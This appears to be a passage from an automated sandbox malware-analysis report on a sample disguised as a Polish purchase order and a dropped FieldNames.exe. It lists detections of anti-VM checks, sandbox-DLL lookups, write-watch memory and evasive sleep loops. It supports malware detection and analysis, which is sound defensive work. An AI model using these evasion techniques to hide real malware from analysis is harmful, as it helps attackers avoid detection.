Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FieldNames.exe PID: 1272, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Memory allocated: 15E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Memory allocated: 3060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Memory allocated: 2E60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Memory allocated: 13C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Memory allocated: 2E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Memory allocated: 4E50000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Window / User API: threadDelayed 1955	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Window / User API: threadDelayed 5998	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Window / User API: threadDelayed 2620	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Window / User API: threadDelayed 4112	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2612	Thread sleep count: 1955 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2612	Thread sleep count: 5998 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99651s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -99093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98761s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98613s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98361s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98178s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -98000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97667s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -97015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -96031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -95919s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe TID: 2352	Thread sleep time: -95812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 4500	Thread sleep count: 2620 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 4500	Thread sleep count: 4112 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98843s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98391s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97403s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97057s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96447s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -95984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -95875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -95766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -95656s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99651	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99422	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99312	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99203	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99093	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98875	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98761	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98613	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98499	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98361	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98178	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98000	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97890	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97781	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97667	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97562	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97453	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97343	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97234	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97125	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97015	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96906	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96796	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96687	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96578	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96468	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96359	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96250	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96140	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96031	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 95919	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 95812	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98843	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98391	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98062	Jump to behavior
